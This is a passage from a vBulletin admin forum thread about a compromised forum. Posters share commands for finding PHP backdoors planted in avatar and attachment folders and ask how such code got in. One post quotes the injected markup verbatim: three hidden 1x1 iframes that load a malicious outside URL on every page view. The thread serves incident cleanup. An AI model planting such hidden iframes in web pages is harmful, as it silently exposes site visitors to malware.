Announcement

Collapse
No announcement yet.

Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #31
    on linux use this comman

    find /your_forum_dir/customprofilepics -name '*.php'
    find /your_forum_dir/attachments -name '*.php'

    if you find any .php
    delete it
    Thai Language Pack for vBulletin 4 | Thai Language Pack for vBulletin 3.8.X
    PaLungJit.com

    Comment


    • #32
      ls -lR custom* | grep .php
      ls -lR attachments | grep .php

      Either works
      Sites I Run: Motorola Droid / Verizon Droid Forum, Nexus One Forum, iPhone News, Wii News & Wii Forum, HTC EVO Forum, iPad Forum, iPhone 4 Forum, Android Forum, Sprint Android Forum, AT&T Android Forum, T-Mobile Android Forum, Droid X Forum, HTC Incredible Forum.

      Comment


      • #33
        is there a way to modify the htaccess to tell 777 chmod directories like attachments, that only image files are accessible?

        I have found 2 php files in those folders as well and deleted them. I think they were in attachments and customprofilepics. Here is the code of the PHP file in case somebody can figure out what its doing.

        Files were called: avatar103814_1.php & profilepic99214_1.php
        contents of avatar103814_1.php: (too long to post)

        Comment


        • #34
          Originally posted by digijeff View Post
          is there a way to modify the htaccess to tell 777 chmod directories like attachments, that only image files are accessible?
          Technically, yes.

          Make the script pass uploads through GD to determine if they are indeed images.

          How to do that, I wouldn't have the slightest clue.
          My Live vB5 Site - NZEating.com
          vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

          Comment


          • #35
            This just happened to me as well - I'm running the latest version of vbulletin 3.8 and vbseo. I have a feeling there's another injection point somewhere.

            Capture more registrations - Advanced Guest Posting & Registration
            Cell Phone Forums | Nikonites

            Comment


            • #36
              I had this happen to me on Christmas day! But after logging in here and reading others fixes I sorted it out. I found a custom avatar that was a PHP file rather than a gif. I deleted it. Upgraded VBSEO and the problem was gone.....until Yesterday.

              Someone using Sophos said there was a trojan on the site, but no one else was saying anything and I had about 600 users online at the time who normally shout out at the tiniest thing wrong, so I ignored it. Then today someone else reported the same. So I started looking. First place I looked was the source of my index and there at the top was.

              <iframe width=1 height=1 border=0 frameborder=0 src=\"http://centiyo.com/in.cgi?default\"><iframe width=1 height=1 border=0 frameborder=0 src=\"http://centiyo.com/in.cgi?default\"><iframe width=1 height=1 border=0 frameborder=0 src=\"http://centiyo.com/in.cgi?default\">
              Seems like 3 instances of the same code. Once I remove it from the template the Sophos users are allowed back in. I am still using the latest VBSEO, latest VB etc, I checked avatars and customprofilepics and there seems to be no dodgy images, well none ending in PHP like last time.

              Three instances, does that mean some script will write it in my header every day?

              So how did this code get in my header?

              Thanks

              Comment

              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...
              X